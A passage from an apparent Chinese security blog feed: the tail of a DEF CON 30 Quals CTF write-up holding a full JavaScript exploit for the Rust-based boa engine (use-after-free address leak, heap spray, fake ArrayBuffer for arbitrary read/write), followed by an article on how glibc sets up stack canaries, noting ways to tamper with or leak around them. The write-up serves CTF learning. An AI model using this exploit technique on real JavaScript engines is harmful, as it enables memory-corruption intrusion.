function_">log</span>(x) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">debug</span> = (<span class="params">x</span>) =&gt; &#123; <span class="title function_">log</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(x)) &#125;;</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">gc</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">collectGarbage</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">bp</span> = (<span class="params"></span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sysbreak</span>();</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">sleep</span> = (<span class="params">x</span>) =&gt; <span class="variable language_">console</span>.<span class="title function_">sleep</span>(x);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">hex</span> = (<span class="params">x</span>) =&gt; (<span class="string">&quot;0x&quot;</span> + x.<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">// parse tools</span></span><br><span class="line"><span class="comment">// let get_js_value = (obj) =&gt; </span></span><br><span class="line"><span class="comment">//     Number.parseInt(console.debug(obj).split(&quot;JsValue @&quot;)[1].split(&quot;\n&quot;)[0]);</span></span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_obj_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Object @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_method_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Methods @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">let</span> <span class="title function_">get_buffer_data_addr</span> = (<span class="params">obj</span>) =&gt; </span><br><span class="line">    <span class="title class_">Number</span>.<span class="built_in">parseInt</span>(<span class="variable language_">console</span>.<span class="title function_">debug</span>(obj).<span class="title function_">split</span>(<span class="string">&quot;Buffer Data @&quot;</span>)[<span class="number">1</span>].<span class="title function_">split</span>(<span class="string">&quot;\n&quot;</span>)[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> fake_timeout = &#123; <span class="title function_">valueOf</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] fake_timeout called&quot;</span>);</span><br><span class="line">    <span class="title function_">sleep</span>(<span class="number">2000</span>);</span><br><span class="line">    <span class="title function_">gc</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>; </span><br><span class="line">&#125;&#125;;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 1. leak heap addresses</span></span><br><span class="line"><span class="keyword">let</span> cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">cache.<span class="title function_">set</span>(<span class="string">&#x27;leak&#x27;</span>, <span class="keyword">new</span> <span class="title class_">Uint32Array</span>(<span class="number">20</span>), <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> uaf_obj = cache.<span class="title function_">get</span>(<span class="string">&quot;leak&quot;</span>, fake_timeout);</span><br><span class="line"></span><br><span class="line"><span class="title function_">debug</span>(uaf_obj);</span><br><span class="line"><span class="title function_">log</span>(uaf_obj.<span class="property">length</span>)</span><br><span class="line"><span class="comment">// for (let i = 0; i &lt; uaf_obj.length; ++i) &#123;</span></span><br><span class="line"><span class="comment">//     log(i + &quot; =&gt; &quot; + uaf_obj[i]);</span></span><br><span class="line"><span class="comment">// &#125;</span></span><br><span class="line"></span><br><span class="line">lower_heap_addr = uaf_obj[<span class="number">3</span>] * <span class="number">0x100000000</span> + uaf_obj[<span class="number">2</span>] - <span class="number">0x440f0</span>;</span><br><span class="line">base_addr = uaf_obj[<span class="number">5</span>] * <span class="number">0x100000000</span> + uaf_obj[<span class="number">4</span>] - <span class="number">0x11a9678</span>;</span><br><span class="line">higher_heap_addr = uaf_obj[<span class="number">17</span>] * <span class="number">0x100000000</span> + uaf_obj[<span class="number">16</span>] - <span class="number">0x1f07</span>;</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] lower_heap_addr: &quot;</span> + <span class="title function_">hex</span>(lower_heap_addr)); </span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] higher_heap_addr: &quot;</span> + <span class="title function_">hex</span>(higher_heap_addr));</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] base_addr: &quot;</span> + <span class="title function_">hex</span>(base_addr));</span><br><span class="line"><span class="keyword">if</span> (((lower_heap_addr | higher_heap_addr | base_addr) &amp; <span class="number">0xfff</span>) != <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[-] Error wrong addr.&quot;</span>)</span><br><span class="line">    <span class="title function_">bp</span>(); <span class="comment">// quit</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] Leak successfuly.&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// 2. heap spray</span></span><br><span class="line"><span class="keyword">let</span> new_cache = <span class="keyword">new</span> <span class="title class_">TimedCache</span>();</span><br><span class="line">new_cache.<span class="title function_">set</span>(<span class="string">&#x27;spray&#x27;</span>, &#123;<span class="attr">a</span>:&#123;&#125;, <span class="attr">b</span>:&#123;&#125;&#125;, <span class="number">1000</span>);</span><br><span class="line"><span class="keyword">let</span> new_uaf_obj = new_cache.<span class="title function_">get</span>(<span class="string">&quot;spray&quot;</span>, fake_timeout);</span><br><span class="line"><span class="title function_">debug</span>(new_uaf_obj)</span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> spray_objs = [];</span><br><span class="line"><span class="comment">// 事实上只要分配一次就够了</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">1</span>; i++) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x180</span>);</span><br><span class="line">    <span class="title function_">debug</span>(obj);</span><br><span class="line">    spray_objs.<span class="title function_">push</span>(obj);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="title function_">get_buffer_data_addr</span>(spray_objs[<span class="number">0</span>]) + <span class="number">0x28</span> != <span class="title function_">get_obj_addr</span>(new_uaf_obj)) &#123;</span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[-] Error heap spray failed.&quot;</span>)</span><br><span class="line">    <span class="title function_">bp</span>(); <span class="comment">// quit</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] Heap spray successfuly.&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">// 3. fake obj</span></span><br><span class="line"><span class="keyword">let</span> views = <span class="keyword">new</span> <span class="title class_">DataView</span>(spray_objs[<span class="number">0</span>]);</span><br><span class="line"><span class="comment">// // debug write</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; views.<span class="property">byteLength</span> / <span class="number">8</span>; i++)</span><br><span class="line">    views.<span class="title function_">setBigUint64</span>(<span class="number">8</span>*i, <span class="title class_">BigInt</span>(i*<span class="number">0x10000</span> + i), <span class="literal">true</span>);</span><br><span class="line"><span class="comment">// try to restore the data</span></span><br><span class="line"><span class="keyword">let</span> ab = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x100</span>);</span><br><span class="line"><span class="comment">// ArrayBuffer ptr</span></span><br><span class="line"><span class="keyword">let</span> ptr = base_addr</span><br><span class="line"></span><br><span class="line"><span class="comment">// mem chunk header</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x00</span>, <span class="number">0x00n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x01</span>, <span class="title class_">BigInt</span>(lower_heap_addr + <span class="number">0x440f0</span>), <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x02</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0x11a9678</span>), <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x03</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line"><span class="comment">// mut borrow flag</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x04</span>, <span class="number">0x01n</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Object Kind (ArrayBuffer)</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x05</span>, <span class="number">0x02n</span>, <span class="literal">true</span>);        </span><br><span class="line"><span class="comment">// Target pointer</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title class_">BigInt</span>(ptr), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// some size</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x07</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x08</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x09</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x0a</span>, <span class="number">0x101n</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x0e</span>, <span class="title class_">BigInt</span>(ptr), <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x0f</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x10</span>, <span class="number">0x100n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x11</span>, <span class="title class_">BigInt</span>(<span class="title function_">get_method_addr</span>(ab)), <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x13</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0xeab740</span>), <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x1a</span>, <span class="number">0x08n</span>, <span class="literal">true</span>);</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x21</span>, <span class="number">0x08n</span>, <span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x13</span>, <span class="number">0x08n</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0xeab740</span>));</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x17</span>, <span class="number">0x08n</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0xeab740</span>));</span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x1e</span>, <span class="number">0x08n</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0xeab740</span>));</span><br><span class="line"></span><br><span class="line"><span class="title function_">debug</span>(ab);</span><br><span class="line"><span class="title function_">debug</span>(new_uaf_obj);</span><br><span class="line"><span class="comment">// bp();</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">let</span> new_view = <span class="keyword">new</span> <span class="title class_">DataView</span>(new_uaf_obj);</span><br><span class="line"></span><br><span class="line"><span class="comment">// test read and write</span></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0x1218000</span>), <span class="literal">true</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line">new_view.<span class="title function_">setBigUint64</span>(<span class="number">0</span>, <span class="number">0x1122334455667788n</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line">views.<span class="title function_">setBigUint64</span>(<span class="number">8</span> * <span class="number">0x06</span>, <span class="title class_">BigInt</span>(base_addr + <span class="number">0x1218100</span>), <span class="literal">true</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line">new_view.<span class="title function_">setBigUint64</span>(<span class="number">0</span>, <span class="number">0x33445566778899aan</span>);</span><br><span class="line"><span class="title function_">log</span>(new_view.<span class="title function_">getBigUint64</span>(<span class="number">0</span>).<span class="title function_">toString</span>(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"><span class="title function_">bp</span>();</span><br></pre></td></tr></table></figure><p>本题复盘结束。在这次复盘中，主要学习了 rust 在二进制层面的一些特性，同时也算通过这题入了 rust pwn 的一个小门。</p><h2 id="七、参考">七、参考</h2><p>本次复盘全程参考 r3kapig Defcon-30-Quals 文档 + 群内消息记录讨论，感谢 r3kapig 诸位师傅！</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里将记录着本人复盘 Defcon 30 Quals 中 &lt;code&gt;constricted&lt;/code&gt; 的复盘笔记。&lt;/p&gt;
&lt;p&gt;这道题为 &lt;code&gt;boa&lt;/code&gt; 项目提供了一个 git diff，要求在应用这个 diff 后对 boa 进行漏洞利用。boa 是一个&lt;strong&gt;使用 rust 编写的 javascript 引擎&lt;/strong&gt;，要想 pwn 掉它就得编写 JS 的漏洞利用脚本。&lt;/p&gt;
&lt;p&gt;当初做这题时自己还没接触过 rust，这次 &lt;s&gt;学成归来后&lt;/s&gt; 可以好好看看这题。&lt;/p&gt;
&lt;p&gt;这题的意图是想说明，&lt;strong&gt;即便是用 rust 编写的程序也仍然会存在漏洞&lt;/strong&gt;。&lt;/p&gt;</summary>
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
  </entry>
  
  <entry>
    <title>浅析 Linux 程序的 Canary 机制</title>
    <link href="https://kiprey.github.io/2022/08/thread_canary/"/>
    <id>https://kiprey.github.io/2022/08/thread_canary/</id>
    <published>2022-08-24T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.140Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>一直都比较好奇 Canary 在 Linux 中的实现，但没什么心思去具体了解它的实现。这种好奇心在得知<strong>可以通过修改子线程的线程局部存储来达到篡改 canary 目的</strong>时达到了高峰，于是想好好去研究一下。</p><p>太久没写博客了，这里就简单记录一下。</p><span id="more"></span><h2 id="二、什么是-Canary">二、什么是 Canary</h2><p>Canary 是一种栈保护机制，用于在函数返回时检测当前栈是否被破坏。当函数调用压入新栈帧时，编译器会在新栈帧的栈底放一个随机值，并在函数返回退出栈帧时检查这个随机值是否被破坏。如果被破坏则说明当前存在栈溢出，程序退出：</p><p><img src="/2022/08/thread_canary/image-20220824202737514.png" alt="image-20220824202737514"></p><p>有意思的是，为了防止 canary 被 printf 等字符串输出函数泄露，<strong>canary 的最低位始终为 <code>/x00</code></strong>。</p><p>当 Canary 验证失败时，<strong>编译器</strong>会要求调用 <code>__stack_chk_fail</code> 函数。应用层在触发 canary 异常时所调用的 <code>__stack_chk_fail</code> 函数实现在 glibc 中，该函数会打印一些信息并终止程序。由于该函数在输出信息时会根据 <code>argv[0]</code> 来输出程序路径，因此如果栈溢出长度可控的话，则攻击者可以控制栈底的 <code>argv[0]</code> 指针，利用 <code>__stack_chk_fail</code> 的触发来泄露信息。</p><p>注意 Canary 在 Linux 内核中也有应用，若在执行 Linux 内核代码时触发了栈溢出，则控制流将调用位于内核的 <code>__stack_chk_fail</code> 函数，该函数实际调用 panic 以终止内核执行。不过内核的 canary 使用已经有了现成的文章，因此这里不再赘述。</p><h2 id="三、深入-glibc">三、深入 glibc</h2><p>这里参考的是 glibc-2.23，虽然版本偏老但是原理还是不变的。</p><p>先一步一步来分析。</p><h3 id="1-Canary-来源">1. Canary 来源</h3><p>在 <code>csu\libc-start.c</code> 中的 <code>__libc_start_main</code> 函数中，可以找到 Canary 的赋值语句：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">  <span class="comment">/* Set up the stack checker&#x27;s canary.  */</span></span><br><span class="line">  <span class="type">uintptr_t</span> stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);</span><br><span class="line"><span class="meta"># <span class="keyword">ifdef</span> THREAD_SET_STACK_GUARD</span></span><br><span class="line">  <span class="built_in">THREAD_SET_STACK_GUARD</span> (stack_chk_guard);</span><br><span class="line"><span class="meta"># <span class="keyword">else</span></span></span><br><span class="line">  __stack_chk_guard = stack_chk_guard;</span><br><span class="line"><span class="meta"># <span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>其中，<code>_dl_random</code> 是一个<strong>存放来自内核的随机数</strong>的地址：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Random data provided by the kernel.  */</span></span><br><span class="line"><span class="type">void</span> *_dl_random;</span><br></pre></td></tr></table></figure><p>这个内核的随机数如果要细究初始化的时间点的话， 那只能说是在<strong>加载动态链接器</strong>之前（一个特别早的时间点）完成，其栈回溯如下：</p><ol><li><p><strong>elf\rtld.c: RTLD_START 宏</strong>：动态链接器主入口。</p></li><li><p><strong>sysdeps\x86_64\dl-machine.h: RTLD_START 宏具体 asm 定义</strong>：动态链接器的实现涉及汇编，因此需要根据对应的架构来实现不同汇编代码的动态链接器。 从注释和代码中可以得知，动态链接器会先调用 <code>_dl_start_user</code>来做一些初始化，之后将控制流跳转至用户程序的 ELF entry 地址：</p> <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Initial entry point code for the dynamic linker.</span></span><br><span class="line"><span class="comment">  The C function `_dl_start&#x27; is the real entry point;</span></span><br><span class="line"><span class="comment">  its return value is the user program&#x27;s entry point.  */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> RTLD_START asm (<span class="string">&quot;\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">.text\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  .align 16\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">.globl _start\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">.globl _dl_start_user\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">_start:\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  movq %rsp, %rdi\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  call _dl_start\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">_dl_start_user:\n\</span></span></span><br><span class="line"><span class="string"><span class="meta"></span></span></span><br><span class="line"><span class="string"><span class="meta">  ...</span></span></span><br><span class="line"><span class="string"><span class="meta"></span></span></span><br><span class="line"><span class="string"><span class="meta">  # And make sure %rsp points to argc stored on the stack.\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  movq %r13, %rsp\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  # Jump to the user&#x27;s entry point.\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">  jmp *%r12\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">.previous\n\</span></span></span><br><span class="line"><span class="string"><span class="meta">&quot;</span>);</span></span><br></pre></td></tr></table></figure></li><li><p><strong>elf\rtld.c: _dl_start -&gt; _dl_start_final -&gt; _dl_sysdep_start 函数</strong>：_dl_sysdep_start 函数会调用一些平台依赖函数来做初始化等等，并调用 <code>dl_main</code> 函数来获取具体的用户程序 entry 地址。不过这个函数我们的重点不在于刚刚说的那些操作，而是这个 for 循环：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">ElfW</span>(Addr)</span><br><span class="line">_dl_sysdep_start (<span class="type">void</span> **start_argptr,</span><br><span class="line">     <span class="built_in">void</span> (*dl_main) (<span class="type">const</span> <span class="built_in">ElfW</span>(Phdr) *phdr, <span class="built_in">ElfW</span>(Word) phnum,</span><br><span class="line">          <span class="built_in">ElfW</span>(Addr) *user_entry, <span class="built_in">ElfW</span>(<span class="type">auxv_t</span>) *auxv))</span><br><span class="line">&#123;</span><br><span class="line">  ...</span><br><span class="line">  <span class="built_in">DL_FIND_ARG_COMPONENTS</span> (start_argptr, _dl_argc, _dl_argv, _environ,</span><br><span class="line">         <span class="built_in">GLRO</span>(dl_auxv));</span><br><span class="line">  <span class="keyword">for</span> (av = <span class="built_in">GLRO</span>(dl_auxv); av-&gt;a_type != AT_NULL; <span class="built_in">set_seen</span> (av++))</span><br><span class="line">    ...</span><br><span class="line">   <span class="keyword">case</span> AT_RANDOM:</span><br><span class="line">   _dl_random = (<span class="type">void</span> *) av-&gt;a_un.a_val;</span><br><span class="line">   <span class="keyword">break</span>;</span><br><span class="line">    ...</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>start_argptr</code> 是一个指向调用动态链接器 <code>argc</code>, <code>argv</code>, <code>env</code>, <code>auxv</code> 数据的指针，而<code>DL_FIND_ARG_COMPONENTS</code>宏就是把这些数据一个个分门别类放到对应的变量 <code>_dl_argc</code>、<code>_dl_argv</code>、<code>_environ</code>、<code>_dl_auxv</code> 上去。即可以得知该动态链接器被调用的参数除了我们最熟悉的三个以外，还多了一个 <code>auxv</code>。</p><p>这个多出来的 auxiliary vector 参数是一个存放辅助程序执行的数据数组，至关重要。该参数里存放了很多有用的信息。这里我们只关心 <code>AT_RANDOM</code>，即来自内核的随机数。这个随机数就是在这里被赋值给 <code>_dl_random</code> 变量用于生成 canary 。</p></li></ol><p>回到 <code>__libc_start_main</code> 函数，在获取到随机数变量后，实际生成 canary 的逻辑如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\unix\sysv\linux\dl-osinfo.h</span></span><br><span class="line"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">uintptr_t</span> __attribute__ ((always_inline))</span><br><span class="line">_dl_setup_stack_chk_guard (<span class="type">void</span> *dl_random)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">union</span></span><br><span class="line">  &#123;</span><br><span class="line">    <span class="type">uintptr_t</span> num;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">char</span> bytes[<span class="built_in">sizeof</span> (<span class="type">uintptr_t</span>)];</span><br><span class="line">  &#125; ret;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* We need in the moment only 8 bytes on 32-bit platforms and 16</span></span><br><span class="line"><span class="comment">     bytes on 64-bit platforms.  Therefore we can use the data</span></span><br><span class="line"><span class="comment">     directly and not use the kernel-provided data to seed a PRNG.  */</span></span><br><span class="line">  <span class="built_in">memcpy</span> (ret.bytes, dl_random, <span class="built_in">sizeof</span> (ret));</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> BYTE_ORDER == LITTLE_ENDIAN</span></span><br><span class="line">  ret.num &amp;= ~(<span class="type">uintptr_t</span>) <span class="number">0xff</span>;</span><br><span class="line"><span class="meta">#<span class="keyword">elif</span> BYTE_ORDER == BIG_ENDIAN</span></span><br><span class="line">  ret.num &amp;= ~((<span class="type">uintptr_t</span>) <span class="number">0xff</span> &lt;&lt; (<span class="number">8</span> * (<span class="built_in">sizeof</span> (ret) - <span class="number">1</span>)));</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line"><span class="meta"># <span class="keyword">error</span> <span class="string">&quot;BYTE_ORDER unknown&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">  <span class="keyword">return</span> ret.num;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>可以看到，canary 的值与 <code>dl_random</code> 的值相近，不同的是会在低字节处强制置为 <code>\x00</code> 防止泄露， 而该逻辑也与我们之前观察得到的结论相符。</p><h3 id="2-Canary-保存">2. Canary 保存</h3><p>我们还是先从 <code>__libc_start_init</code> 函数出发：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">  <span class="comment">/* Set up the stack checker&#x27;s canary.  */</span></span><br><span class="line">  <span class="type">uintptr_t</span> stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);</span><br><span class="line"><span class="meta"># <span class="keyword">ifdef</span> THREAD_SET_STACK_GUARD</span></span><br><span class="line">  <span class="built_in">THREAD_SET_STACK_GUARD</span> (stack_chk_guard);</span><br><span class="line"><span class="meta"># <span class="keyword">else</span></span></span><br><span class="line">  __stack_chk_guard = stack_chk_guard;</span><br><span class="line"><span class="meta"># <span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>如果设置了 <code>THREAD_SET_STACK_GUARD</code> 宏，即启用了线程栈保护，那么这个 canary 值就会设置进<strong>线程局部存储</strong>里：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\x86_64\nptl\tls.h</span></span><br><span class="line"><span class="comment">/* Set the stack guard field in TCB head.  */</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> THREAD_SET_STACK_GUARD(value) \</span></span><br><span class="line"><span class="meta">    THREAD_SETMEM (THREAD_SELF, header.stack_guard, value)</span></span><br></pre></td></tr></table></figure><p>其中，<strong>THREAD_SELF</strong> 指的是当前线程的<strong>线程控制块</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\x86_64\nptl\tls.h</span></span><br><span class="line"><span class="comment">/* Return the thread descriptor for the current thread.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">   The contained asm must *not* be marked volatile since otherwise</span></span><br><span class="line"><span class="comment">   assignments like</span></span><br><span class="line"><span class="comment">  pthread_descr self = thread_self();</span></span><br><span class="line"><span class="comment">   do not get optimized away.  */</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> THREAD_SELF \</span></span><br><span class="line"><span class="meta">  (&#123; struct pthread *__self;                  \</span></span><br><span class="line"><span class="meta">     asm (<span class="string">&quot;mov %%fs:%c1,%0&quot;</span> : <span class="string">&quot;=r&quot;</span> (__self)           \</span></span><br><span 